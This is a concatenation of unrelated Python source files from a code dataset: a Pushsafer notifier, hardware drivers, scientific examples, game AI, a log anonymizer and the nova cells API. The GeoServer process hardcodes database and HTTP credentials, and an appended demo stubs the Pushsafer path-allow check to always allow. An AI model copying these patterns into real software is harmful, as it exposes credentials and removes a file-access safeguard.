local_path = picture1.get(ATTR_PICTURE1_PATH, None)
username = picture1.get(ATTR_PICTURE1_USERNAME)
password = picture1.get(ATTR_PICTURE1_PASSWORD)
auth = picture1.get(ATTR_PICTURE1_AUTH)
if url is not None:
_LOGGER.debug("Loading image from url %s", url)
picture1_encoded = self.load_from_url(url, username, password, auth)
elif local_path is not None:
_LOGGER.debug("Loading image from file %s", local_path)
picture1_encoded = self.load_from_file(local_path)
else:
_LOGGER.warning("missing url or local_path for picture1")
else:
_LOGGER.debug("picture1 is not specified")
payload = {
"k": self._private_key,
"t": title,
"m": message,
"s": data.get(ATTR_SOUND, ""),
"v": data.get(ATTR_VIBRATION, ""),
"i": data.get(ATTR_ICON, ""),
"c": data.get(ATTR_ICONCOLOR, ""),
"u": data.get(ATTR_URL, ""),
"ut": data.get(ATTR_URLTITLE, ""),
"l": data.get(ATTR_TIME2LIVE, ""),
"pr": data.get(ATTR_PRIORITY, ""),
"re": data.get(ATTR_RETRY, ""),
"ex": data.get(ATTR_EXPIRE, ""),
"a": data.get(ATTR_ANSWER, ""),
"p": picture1_encoded,
}
for target in targets:
payload["d"] = target
response = requests.post(_RESOURCE, data=payload, timeout=CONF_TIMEOUT)
if response.status_code != HTTP_OK:
_LOGGER.error("Pushsafer failed with: %s", response.text)
else:
_LOGGER.debug("Push send: %s", response.json())
@classmethod
def get_base64(cls, filebyte, mimetype):
"""Convert the image to the expected base64 string of pushsafer."""
if mimetype not in _ALLOWED_IMAGES:
_LOGGER.warning("%s is a not supported mimetype for images", mimetype)
return None
base64_image = base64.b64encode(filebyte).decode("utf8")
return f"data:{mimetype};base64,{base64_image}"
def load_from_url(self, url=None, username=None, password=None, auth=None):
"""Load image/document/etc from URL."""
if url is not None:
_LOGGER.debug("Downloading image from %s", url)
if username is not None and password is not None:
auth_ = HTTPBasicAuth(username, password)
response = requests.get(url, auth=auth_, timeout=CONF_TIMEOUT)
else:
response = requests.get(url, timeout=CONF_TIMEOUT)
return self.get_base64(response.content, response.headers["content-type"])
_LOGGER.warning("url not found in param")
return None
def load_from_file(self, local_path=None):
"""Load image/document/etc from a local path."""
try:
if local_path is not None:
_LOGGER.debug("Loading image from local path")
if self.is_allowed_path(local_path):
file_mimetype = mimetypes.guess_type(local_path)
_LOGGER.debug("Detected mimetype %s", file_mimetype)
with open(local_path, "rb") as binary_file:
data = binary_file.read()
return self.get_base64(data, file_mimetype[0])
else:
_LOGGER.warning("Local path not found in params!")
except OSError as error:
_LOGGER.error("Can't load from local path: %s", error)
return None
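# Editor's sketch (added; not part of Home Assistant): driving the service
# class directly, outside hass. The private key is a placeholder and the
# allowed-path check is stubbed to always allow.
def _demo_pushsafer_send(private_key='YOUR_PRIVATE_KEY'):
    service = PushsaferNotificationService(private_key, lambda path: True)
    service.send_message('Hello from a test', title='Test push')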
| mit | -6,397,761,538,905,725,000 | 35.915663 | 86 | 0.602807 | false |
thortex/rpi3-webiopi | webiopi_0.7.1/python/webiopi/devices/onewire.py | 1 | 2571 | # Copyright 2012-2013 Eric Ptak - trouch.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from webiopi.devices.bus import Bus, loadModule
EXTRAS = {
"TEMP": {"loaded": False, "module": "w1-therm"},
"2408": {"loaded": False, "module": "w1_ds2408"},
"2413": {"loaded": False, "module": "w1_ds2413"}
}
def loadExtraModule(name):
if EXTRAS[name]["loaded"] == False:
loadModule(EXTRAS[name]["module"])
EXTRAS[name]["loaded"] = True
class OneWire(Bus):
def __init__(self, slave=None, family=0, extra=None):
Bus.__init__(self, "ONEWIRE", "/sys/bus/w1/devices/w1_bus_master1/w1_master_slaves", os.O_RDONLY)
if self.fd > 0:
os.close(self.fd)
self.fd = 0
self.family = family
if slave != None:
addr = slave.split("-")
if len(addr) == 1:
self.slave = "%02x-%s" % (family, slave)
elif len(addr) == 2:
prefix = int(addr[0], 16)
if family > 0 and family != prefix:
raise Exception("1-Wire slave address %s does not match family %02x" % (slave, family))
self.slave = slave
else:
devices = self.deviceList()
if len(devices) == 0:
raise Exception("No device match family %02x" % family)
self.slave = devices[0]
        if extra is not None:
            loadExtraModule(extra)
def __str__(self):
return "1-Wire(slave=%s)" % self.slave
def deviceList(self):
devices = []
with open(self.device) as f:
lines = f.read().split("\n")
if self.family > 0:
prefix = "%02x-" % self.family
for line in lines:
if line.startswith(prefix):
devices.append(line)
else:
devices = lines
        return devices
def read(self):
with open("/sys/bus/w1/devices/%s/w1_slave" % self.slave) as f:
data = f.read()
return data
| apache-2.0 | -53,284,425,979,220,800 | 33.743243 | 107 | 0.558149 | false |
NumCosmo/NumCosmo | examples/example_ode_spline.py | 1 | 1165 | #!/usr/bin/env python
try:
import gi
gi.require_version('NumCosmo', '1.0')
gi.require_version('NumCosmoMath', '1.0')
except:
pass
import ctypes
from math import *
from gi.repository import NumCosmoMath as Ncm
from gi.repository import NumCosmo as Nc
from gi.repository import GObject
#
# Initializing the library objects, this must be called before
# any other library function.
#
Ncm.cfg_init ()
class TestClass (Ncm.Model):
def __call__ (self, *args):
return args[0]
aas = TestClass ()
def test (y, x, data):
return y
test.argtypes = [ctypes.c_double, ctypes.c_double, ctypes.c_char_p]
test.restype = ctypes.c_double
s = Ncm.SplineCubicNotaknot.new ()
os = Ncm.OdeSpline.new (s, test)
os.set_reltol (1.0e-3)
os.props.xi = 0.0
os.props.xf = 5.0
os.props.yi = 1.0
nhaca = [1,2,3,4]
os.prepare (id (nhaca))
ss = os.peek_spline()
for i in range (ss.len):
print ("%d % 22.15g % 22.15g % 22.15g % 22.15g % 22.15g" % (i, ss.xv.get (i), ss.yv.get (i), ss.b.get (i), ss.c.get(i), ss.d.get(i)))
#for i in range (100):
# x = 1.0 / 99.0 * i
# expx = exp (x)
# odex = ss.eval (x)
# print (x, expx, odex, fabs ((expx - odex) / expx))
| gpl-3.0 | 8,754,895,868,490,639,000 | 19.438596 | 137 | 0.64206 | false |
Geodan/natuurbandmodel | server-wps/wildfire_makelcp.py | 1 | 1431 | from geoserver.wps import process
from com.ziclix.python.sql import zxJDBC
jdbc_url = "jdbc:postgresql://192.168.40.5:3389/research"
username = "modeluser"
password = "modeluser"
driver = "org.postgresql.Driver"
cgi_url = "http://model.geodan.nl/main/gmi/cgi-bin/"
@process(
title='MakeLcp',
description='Build landscape file',
inputs={
'userid' : (int, 'User ID'),
'terreinid': (int,'Terrein ID'),
'landscapename': (str,'Name of landscape')
},
outputs={
'string': (str,'JSON string')
}
)
def run(userid, terreinid, landscapename):
#Connect to postgres
conn = zxJDBC.connect(jdbc_url,username, password, driver)
cur = conn.cursor()
query = """
INSERT INTO administration.runs ("user", model, status, percentage, lastupdate) VALUES (?,?,?, ?, now());
"""
data = [1,4,"scheduled",0]
cur.execute(query, data)
conn.commit()
query = """SELECT MAX(id) FROM administration.runs;"""
cur.execute(query)
result = cur.fetchone()
runid = result[0]
query = """
INSERT INTO administration.params_makelcp
(run, terrein_id, terrein_name)
VALUES
(?, ?, ?);
"""
data = [runid,terreinid,landscapename]
cur.execute(query, data )
conn.commit()
import subprocess
p = subprocess.Popen(['/usr/bin/curl','-u', 'demo:demo',cgi_url+'makeLcp.py'])
p.daemon = True
return '{"runid":'+str(runid)+',"status":"scheduled","percentage":0}'
| mit | 4,120,670,946,866,093,600 | 25 | 108 | 0.638714 | false |
frederica07/Dragon_Programming_Process | PyOpenGL-3.0.2/OpenGL/GL/EXT/cmyka.py | 1 | 1439 | '''OpenGL extension EXT.cmyka
This module customises the behaviour of the
OpenGL.raw.GL.EXT.cmyka to provide a more
Python-friendly API
Overview (from the spec)
This extension provides a simple method for OpenGL to read and store
images whose pixels have CMYK or CMYKA formats. The algorithms used to
convert to RGBA from CMYKA and to convert back from RGBA to CMYKA are of
the "black-box" nature, meaning that the application has little control
over how the conversion is done. Also, this black-box mechanism is
available only for transfers to or from memory, not for internal copies
of pixel data (such as invoked by CopyPixels, CopyTexImage1D, etc.)
However, the defined mechanism nicely handles 5-component CMYKA images,
and it is very easy to use.
A more configurable and potentially higher quality color conversion can
be implemented using the color tables, the color matrix, and possibly 3D
and 4D texture lookup. Such a color conversion also applies to copied
pixel data.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/EXT/cmyka.txt
'''
from OpenGL import platform, constants, constant, arrays
from OpenGL import extensions, wrapper
from OpenGL.GL import glget
import ctypes
from OpenGL.raw.GL.EXT.cmyka import *
### END AUTOGENERATED SECTION
from OpenGL import images as _i
_i.COMPONENT_COUNTS[ GL_CMYK_EXT ] = 4
_i.COMPONENT_COUNTS[ GL_CMYKA_EXT ] = 5
| bsd-2-clause | 8,254,447,988,783,673,000 | 38.972222 | 73 | 0.783878 | false |
chaowu2009/stereo-vo | tools/capture_TwoCameras_saveImagesOnly.py | 1 | 2289 | import numpy as np
import cv2
import time
import matplotlib.pylab as plt
"""
Make sure that you hold the checkerboard horizontally (more checkers horizontally than vertically).
In order to get a good calibration you will need to move the checkerboard around in the camera frame such that:
the checkerboard is detected at the left and right edges of the field of view (X calibration)
the checkerboard is detected at the top and bottom edges of the field of view (Y calibration)
the checkerboard is detected at various angles to the camera ("Skew")
the checkerboard fills the entire field of view (Size calibration)
checkerboard tilted to the left, right, top and bottom (X,Y, and Size calibration)
"""
left = 1
right = 2
time_in_ms= 1000/100
#folder = "/home/cwu/Downloads/";
folder = "/home/hillcrest/project/stereo-calibration/calib_imgs/ARC/"
folder = "/home/hillcrest/project/stereo-calibration/calib_imgs/ARC/"
#folder = "D:/vision/stereo-calibration/calib_imgs/ARC/"
fp = open(folder + "timeStamp.txt","w")
WIDTH = 1280
HEIGHT = 720
WIDTH = 640
HEIGHT = 480
for counter in range(1,31):
millis = int(round(time.time() * 1000))
cap1 = cv2.VideoCapture(left)
cap1.set(cv2.CAP_PROP_FRAME_WIDTH,WIDTH)
cap1.set(cv2.CAP_PROP_FRAME_HEIGHT,HEIGHT)
cv2.waitKey(100)
ret, frame1 = cap1.read()
cap1.release()
cap2 = cv2.VideoCapture(right)
cap2.set(cv2.CAP_PROP_FRAME_WIDTH,WIDTH)
cap2.set(cv2.CAP_PROP_FRAME_HEIGHT,HEIGHT)
cv2.waitKey(100)
ret, frame2 = cap2.read()
cap2.release()
#frame1 = cv2.cvtColor(frame1, cv2.COLOR_BGR2GRAY)
#frame2 = cv2.cvtColor(frame2, cv2.COLOR_BGR2GRAY)
# Display the resulting frame
plt.subplot(121)
plt.imshow(frame1)
plt.title('left')
plt.subplot(122)
plt.imshow(frame2)
plt.title('right')
plt.show()
print('another capture', counter)
cv2.waitKey(100)
cv2.imwrite(folder + "img_left/left_" + str(counter) + ".jpg", frame1)
cv2.waitKey(time_in_ms)
cv2.imwrite(folder + "img_right/right_" + str(counter) + ".jpg", frame2)
fp.write(str(counter)+ ","+ str(millis) + "\n")
print("the ", counter, " pairs")
cv2.destroyAllWindows()
fp.close()
print('All Done \n')
| mit | -5,414,921,834,074,587,000 | 25.929412 | 111 | 0.678462 | false |
dnikulin/jula | scripts/make_classes.py | 1 | 3287 | # Copyright (C) 2011 Dmitri Nikulin
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from common import SIZES, classname, mklabel, cells, startfile
def genmatrix(rows, cols):
myclass = classname(rows, cols)
fd = startfile("fixed", myclass)
def line(s=""):
print >> fd, s
traits = [("Matrix_%d_N" % rows), ("Matrix_M_%d" % cols)]
if (rows == cols):
traits.append("Matrix_M_M")
for trait in traits:
line("import org.dnikulin.jula.traits.%s;" % trait)
line()
line("import org.dnikulin.jula.functions.Copy;")
line()
line("public final class %s implements %s {" % (myclass, ", ".join(traits)))
line(" public static final int rows = %d;" % rows)
line(" public static final int cols = %d;" % cols)
line(" public static final int size = (rows * cols);")
line()
for row in range(rows):
labels = ", ".join([mklabel(row, col) for col in range(cols)])
line(" public double %s;" % labels)
line()
line(" @Override")
line(" public int getRows() {")
line(" return rows;")
line(" }")
line()
line(" @Override")
line(" public int getCols() {")
line(" return cols;")
line(" }")
line()
line(" @Override")
line(" public double get(final int row, final int col) {")
line(" assert(row >= 0);")
line(" assert(col >= 0);")
line(" assert(row < rows);")
line(" assert(col < cols);")
line()
line(" switch ((row * cols) + col) {")
for (row, col, label) in cells(rows, cols):
off = (row * cols) + col
line(" case %2d: return %s;" % (off, label))
line(" default: return 0;")
line(" }")
line(" }")
line()
line(" @Override")
line(" public void set(final int row, final int col, final double val) {")
line(" assert(row >= 0);")
line(" assert(col >= 0);")
line(" assert(row < rows);")
line(" assert(col < cols);")
line()
line(" switch ((row * cols) + col) {")
for (row, col, label) in cells(rows, cols):
off = (row * cols) + col
line(" case %2d: %s = val; return;" % (off, label))
line(" default: return;")
line(" }")
line(" }")
line()
line(" @Override")
line(" public %s clone() {" % (myclass))
line(" final %s that = new %s();" % (myclass, myclass))
line(" Copy.copy(this, that);")
line(" return that;")
line(" }")
line("}")
fd.flush()
fd.close()
if __name__ == '__main__':
for rows in SIZES:
for cols in SIZES:
genmatrix(rows, cols)
| apache-2.0 | -7,478,729,938,186,849,000 | 30.912621 | 81 | 0.531488 | false |
MarkusHackspacher/unknown-horizons | horizons/ai/aiplayer/building/firestation.py | 1 | 3179 | # ###################################################
# Copyright (C) 2008-2017 The Unknown Horizons Team
# [email protected]
# This file is part of Unknown Horizons.
#
# Unknown Horizons is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the
# Free Software Foundation, Inc.,
# 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
# ###################################################
from horizons.ai.aiplayer.basicbuilder import BasicBuilder
from horizons.ai.aiplayer.building import AbstractBuilding
from horizons.ai.aiplayer.buildingevaluator import BuildingEvaluator
from horizons.ai.aiplayer.constants import BUILDING_PURPOSE
from horizons.constants import BUILDINGS
class AbstractFireStation(AbstractBuilding):
def iter_potential_locations(self, settlement_manager):
spots_in_settlement = settlement_manager.settlement.buildability_cache.cache[(2, 2)]
village_builder = settlement_manager.village_builder
for coords in village_builder.special_building_assignments[BUILDING_PURPOSE.FIRE_STATION].keys():
if coords not in spots_in_settlement or village_builder.plan[coords][1][0] > village_builder.current_section:
continue
object = settlement_manager.settlement.ground_map[coords].object
if object is None or object.buildable_upon:
yield (coords[0], coords[1], 0)
@property
def producer_building(self):
"""Fire stations don't produce any resources."""
return False
@property
def evaluator_class(self):
return FireStationEvaluator
@classmethod
def register_buildings(cls):
cls._available_buildings[BUILDINGS.FIRE_STATION] = cls
class FireStationEvaluator(BuildingEvaluator):
need_collector_connection = False
record_plan_change = False
@classmethod
def create(cls, production_builder, x, y, orientation):
settlement_manager = production_builder.settlement_manager
village_builder = settlement_manager.village_builder
builder = BasicBuilder.create(BUILDINGS.FIRE_STATION, (x, y), orientation)
assigned_residences = village_builder.special_building_assignments[BUILDING_PURPOSE.FIRE_STATION][(x, y)]
total = len(assigned_residences)
not_serviced = 0
for residence_coords in assigned_residences:
if village_builder.plan[residence_coords][0] == BUILDING_PURPOSE.RESIDENCE:
not_serviced += 1
if not_serviced <= 0 or not_serviced < total * settlement_manager.owner.personality_manager.get('AbstractFireStation').fraction_of_assigned_residences_built:
return None
return FireStationEvaluator(village_builder, builder, not_serviced)
@property
def purpose(self):
return BUILDING_PURPOSE.FIRE_STATION
AbstractFireStation.register_buildings()
| gpl-2.0 | -1,032,238,161,009,814,300 | 38.246914 | 159 | 0.754954 | false |
EDUlib/eTracesX | Scripts/ExtractCours.py | 1 | 2359 | #!/usr/bin/python
import sys
import getopt
import re
import random
def main(argv):
inputfile = ''
outputfile = ''
try:
opts, args = getopt.getopt(argv,"hi:o:",["ifile=","ofile="])
except getopt.GetoptError:
        print 'ExtractCours.py -i <inputfile> -o <outputfile>'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
            print 'ExtractCours.py -i <inputfile> -o <outputfile>'
sys.exit()
elif opt in ("-i", "--ifile"):
inputfile = arg
elif opt in ("-o", "--ofile"):
outputfile = arg
print 'Input file is :', inputfile
print 'Output file is :', outputfile
if inputfile == '' or outputfile == '':
sys.exit()
pUser =re.compile('"username": "([\w.@&\-]*)"')
pCours =re.compile('ITES\.1')
nameDict = dict()
f = open(inputfile, "r")
copy = open(outputfile, "w")
for line in f:
mCours = pCours.search(line)
if mCours:
mUser = pUser.findall(line)
newLine = ''
if len(mUser) == 1:
if mUser[0] != '':
if not nameDict.has_key(mUser[0]):
newName = ''.join(random.SystemRandom().choice('0123456789ABCDEF') for _ in range(16))
i = 0;
while (newName in nameDict.values()) and i < 1000:
newName = ''.join(random.SystemRandom().choice('0123456789ABCDEF') for _ in range(16))
i = i+1;
if i == 1000:
print "Can't find a name :", mUser[0]
sys.exit()
nameDict[mUser[0]] = newName;
# print 'Username is :', mUser[0], ' --- newName :', nameDict[mUser[0]]
newLine = re.sub('"username": "'+ mUser[0] + '"', '"username": "' + nameDict[mUser[0]] + '"', line)
# newLine = re.sub('"username": "'+ mUser[0] + '"', '"username": "' + mUser[0] + '"', line)
# newLine = line
else:
newLine = line
else:
print line
sys.exit()
if newLine != '':
copy.write(newLine)
f.close()
copy.close()
if __name__ == "__main__":
main(sys.argv[1:])
| agpl-3.0 | 3,712,799,693,199,665,700 | 34.208955 | 119 | 0.447647 | false |
imsplitbit/nova | nova/api/openstack/compute/contrib/cells.py | 1 | 15576 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011-2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The cells extension."""
from oslo.config import cfg
from webob import exc
from nova.api.openstack import common
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova.cells import rpc_driver
from nova.cells import rpcapi as cells_rpcapi
from nova.compute import api as compute
from nova import exception
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
from nova.openstack.common import timeutils
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
CONF.import_opt('name', 'nova.cells.opts', group='cells')
CONF.import_opt('capabilities', 'nova.cells.opts', group='cells')
authorize = extensions.extension_authorizer('compute', 'cells')
def make_cell(elem):
elem.set('name')
elem.set('username')
elem.set('type')
elem.set('rpc_host')
elem.set('rpc_port')
caps = xmlutil.SubTemplateElement(elem, 'capabilities',
selector='capabilities')
cap = xmlutil.SubTemplateElement(caps, xmlutil.Selector(0),
selector=xmlutil.get_items)
cap.text = 1
make_capacity(elem)
def make_capacity(cell):
def get_units_by_mb(capacity_info):
return capacity_info['units_by_mb'].items()
capacity = xmlutil.SubTemplateElement(cell, 'capacities',
selector='capacities')
ram_free = xmlutil.SubTemplateElement(capacity, 'ram_free',
selector='ram_free')
ram_free.set('total_mb', 'total_mb')
unit_by_mb = xmlutil.SubTemplateElement(ram_free, 'unit_by_mb',
selector=get_units_by_mb)
unit_by_mb.set('mb', 0)
unit_by_mb.set('unit', 1)
disk_free = xmlutil.SubTemplateElement(capacity, 'disk_free',
selector='disk_free')
disk_free.set('total_mb', 'total_mb')
unit_by_mb = xmlutil.SubTemplateElement(disk_free, 'unit_by_mb',
selector=get_units_by_mb)
unit_by_mb.set('mb', 0)
unit_by_mb.set('unit', 1)
cell_nsmap = {None: wsgi.XMLNS_V10}
class CellTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('cell', selector='cell')
make_cell(root)
return xmlutil.MasterTemplate(root, 1, nsmap=cell_nsmap)
class CellsTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('cells')
elem = xmlutil.SubTemplateElement(root, 'cell', selector='cells')
make_cell(elem)
return xmlutil.MasterTemplate(root, 1, nsmap=cell_nsmap)
class CellDeserializer(wsgi.XMLDeserializer):
"""Deserializer to handle xml-formatted cell create requests."""
def _extract_capabilities(self, cap_node):
caps = {}
for cap in cap_node.childNodes:
cap_name = cap.tagName
caps[cap_name] = self.extract_text(cap)
return caps
def _extract_cell(self, node):
cell = {}
cell_node = self.find_first_child_named(node, 'cell')
extract_fns = {
'capabilities': self._extract_capabilities,
'rpc_port': lambda child: int(self.extract_text(child)),
}
for child in cell_node.childNodes:
name = child.tagName
extract_fn = extract_fns.get(name, self.extract_text)
cell[name] = extract_fn(child)
return cell
def default(self, string):
"""Deserialize an xml-formatted cell create request."""
node = xmlutil.safe_minidom_parse_string(string)
return {'body': {'cell': self._extract_cell(node)}}
def _filter_keys(item, keys):
"""
Filters all model attributes except for keys
item is a dict
"""
return dict((k, v) for k, v in item.iteritems() if k in keys)
def _fixup_cell_info(cell_info, keys):
"""
If the transport_url is present in the cell, derive username,
rpc_host, and rpc_port from it.
"""
if 'transport_url' not in cell_info:
return
# Disassemble the transport URL
transport_url = cell_info.pop('transport_url')
try:
transport = rpc_driver.parse_transport_url(transport_url)
except ValueError:
# Just go with None's
for key in keys:
cell_info.setdefault(key, None)
return cell_info
transport_field_map = {'rpc_host': 'hostname', 'rpc_port': 'port'}
for key in keys:
if key in cell_info:
continue
transport_field = transport_field_map.get(key, key)
cell_info[key] = transport[transport_field]
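# Editor's sketch (added; not part of nova): what _fixup_cell_info() does to
# a cell dict carrying a transport_url; the URL below is a made-up example.
def _example_fixup_cell_info():
    cell = {'name': 'child1',
            'transport_url': 'rabbit://user:pass@host:5672/virtual_host'}
    _fixup_cell_info(cell, ['username', 'rpc_host', 'rpc_port'])
    return cell  # transport_url removed; username/rpc_host/rpc_port filled in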
def _scrub_cell(cell, detail=False):
keys = ['name', 'username', 'rpc_host', 'rpc_port']
if detail:
keys.append('capabilities')
cell_info = _filter_keys(cell, keys + ['transport_url'])
_fixup_cell_info(cell_info, keys)
cell_info['type'] = 'parent' if cell['is_parent'] else 'child'
return cell_info
class Controller(object):
"""Controller for Cell resources."""
def __init__(self, ext_mgr):
self.compute_api = compute.API()
self.cells_rpcapi = cells_rpcapi.CellsAPI()
self.ext_mgr = ext_mgr
def _get_cells(self, ctxt, req, detail=False):
"""Return all cells."""
# Ask the CellsManager for the most recent data
items = self.cells_rpcapi.get_cell_info_for_neighbors(ctxt)
items = common.limited(items, req)
items = [_scrub_cell(item, detail=detail) for item in items]
return dict(cells=items)
@wsgi.serializers(xml=CellsTemplate)
def index(self, req):
"""Return all cells in brief."""
ctxt = req.environ['nova.context']
authorize(ctxt)
return self._get_cells(ctxt, req)
@wsgi.serializers(xml=CellsTemplate)
def detail(self, req):
"""Return all cells in detail."""
ctxt = req.environ['nova.context']
authorize(ctxt)
return self._get_cells(ctxt, req, detail=True)
@wsgi.serializers(xml=CellTemplate)
def info(self, req):
"""Return name and capabilities for this cell."""
context = req.environ['nova.context']
authorize(context)
cell_capabs = {}
my_caps = CONF.cells.capabilities
for cap in my_caps:
key, value = cap.split('=')
cell_capabs[key] = value
cell = {'name': CONF.cells.name,
'type': 'self',
'rpc_host': None,
'rpc_port': 0,
'username': None,
'capabilities': cell_capabs}
return dict(cell=cell)
@wsgi.serializers(xml=CellTemplate)
def capacities(self, req, id=None):
"""Return capacities for a given cell or all cells."""
# TODO(kaushikc): return capacities as a part of cell info and
# cells detail calls in v3, along with capabilities
if not self.ext_mgr.is_loaded('os-cell-capacities'):
raise exc.HTTPNotFound()
context = req.environ['nova.context']
authorize(context)
try:
capacities = self.cells_rpcapi.get_capacities(context,
cell_name=id)
except exception.CellNotFound:
msg = (_("Cell %(id)s not found.") % {'id': id})
raise exc.HTTPNotFound(explanation=msg)
return dict(cell={"capacities": capacities})
@wsgi.serializers(xml=CellTemplate)
def show(self, req, id):
"""Return data about the given cell name. 'id' is a cell name."""
context = req.environ['nova.context']
authorize(context)
try:
cell = self.cells_rpcapi.cell_get(context, id)
except exception.CellNotFound:
raise exc.HTTPNotFound()
return dict(cell=_scrub_cell(cell))
def delete(self, req, id):
"""Delete a child or parent cell entry. 'id' is a cell name."""
context = req.environ['nova.context']
authorize(context)
try:
num_deleted = self.cells_rpcapi.cell_delete(context, id)
except exception.CellsUpdateUnsupported as e:
raise exc.HTTPForbidden(explanation=e.format_message())
if num_deleted == 0:
raise exc.HTTPNotFound()
return {}
def _validate_cell_name(self, cell_name):
"""Validate cell name is not empty and doesn't contain '!' or '.'."""
if not cell_name:
msg = _("Cell name cannot be empty")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
if '!' in cell_name or '.' in cell_name:
msg = _("Cell name cannot contain '!' or '.'")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
def _validate_cell_type(self, cell_type):
"""Validate cell_type is 'parent' or 'child'."""
if cell_type not in ['parent', 'child']:
msg = _("Cell type must be 'parent' or 'child'")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
def _normalize_cell(self, cell, existing=None):
"""
Normalize input cell data. Normalizations include:
* Converting cell['type'] to is_parent boolean.
* Merging existing transport URL with transport information.
"""
# Start with the cell type conversion
if 'type' in cell:
self._validate_cell_type(cell['type'])
cell['is_parent'] = cell['type'] == 'parent'
del cell['type']
# Avoid cell type being overwritten to 'child'
elif existing:
cell['is_parent'] = existing['is_parent']
else:
cell['is_parent'] = False
# Now we disassemble the existing transport URL...
transport = {}
if existing and 'transport_url' in existing:
transport = rpc_driver.parse_transport_url(
existing['transport_url'])
# Copy over the input fields
transport_field_map = {
'username': 'username',
'password': 'password',
'hostname': 'rpc_host',
'port': 'rpc_port',
'virtual_host': 'rpc_virtual_host',
}
for key, input_field in transport_field_map.items():
# Set the default value of the field; using setdefault()
# lets us avoid overriding the existing transport URL
transport.setdefault(key, None)
# Only override the value if we're given an override
if input_field in cell:
transport[key] = cell.pop(input_field)
# Now set the transport URL
cell['transport_url'] = rpc_driver.unparse_transport_url(transport)
@wsgi.serializers(xml=CellTemplate)
@wsgi.deserializers(xml=CellDeserializer)
def create(self, req, body):
"""Create a child cell entry."""
context = req.environ['nova.context']
authorize(context)
if 'cell' not in body:
msg = _("No cell information in request")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
cell = body['cell']
if 'name' not in cell:
msg = _("No cell name in request")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
self._validate_cell_name(cell['name'])
self._normalize_cell(cell)
try:
cell = self.cells_rpcapi.cell_create(context, cell)
except exception.CellsUpdateUnsupported as e:
raise exc.HTTPForbidden(explanation=e.format_message())
return dict(cell=_scrub_cell(cell))
@wsgi.serializers(xml=CellTemplate)
@wsgi.deserializers(xml=CellDeserializer)
def update(self, req, id, body):
"""Update a child cell entry. 'id' is the cell name to update."""
context = req.environ['nova.context']
authorize(context)
if 'cell' not in body:
msg = _("No cell information in request")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
cell = body['cell']
cell.pop('id', None)
if 'name' in cell:
self._validate_cell_name(cell['name'])
try:
# NOTE(Vek): There is a race condition here if multiple
# callers are trying to update the cell
# information simultaneously. Since this
# operation is administrative in nature, and
# will be going away in the future, I don't see
# it as much of a problem...
existing = self.cells_rpcapi.cell_get(context, id)
except exception.CellNotFound:
raise exc.HTTPNotFound()
self._normalize_cell(cell, existing)
try:
cell = self.cells_rpcapi.cell_update(context, id, cell)
except exception.CellNotFound:
raise exc.HTTPNotFound()
except exception.CellsUpdateUnsupported as e:
raise exc.HTTPForbidden(explanation=e.format_message())
return dict(cell=_scrub_cell(cell))
def sync_instances(self, req, body):
"""Tell all cells to sync instance info."""
context = req.environ['nova.context']
authorize(context)
project_id = body.pop('project_id', None)
deleted = body.pop('deleted', False)
updated_since = body.pop('updated_since', None)
if body:
msg = _("Only 'updated_since', 'project_id' and 'deleted' are "
"understood.")
raise exc.HTTPBadRequest(explanation=msg)
if updated_since:
try:
timeutils.parse_isotime(updated_since)
except ValueError:
msg = _('Invalid changes-since value')
raise exc.HTTPBadRequest(explanation=msg)
self.cells_rpcapi.sync_instances(context, project_id=project_id,
updated_since=updated_since, deleted=deleted)
class Cells(extensions.ExtensionDescriptor):
"""Enables cells-related functionality such as adding neighbor cells,
listing neighbor cells, and getting the capabilities of the local cell.
"""
name = "Cells"
alias = "os-cells"
namespace = "http://docs.openstack.org/compute/ext/cells/api/v1.1"
updated = "2013-05-14T00:00:00+00:00"
def get_resources(self):
coll_actions = {
'detail': 'GET',
'info': 'GET',
'sync_instances': 'POST',
'capacities': 'GET',
}
memb_actions = {
'capacities': 'GET',
}
res = extensions.ResourceExtension('os-cells',
Controller(self.ext_mgr), collection_actions=coll_actions,
member_actions=memb_actions)
return [res]
| apache-2.0 | 7,603,201,070,921,146,000 | 34.806897 | 78 | 0.596944 | false |
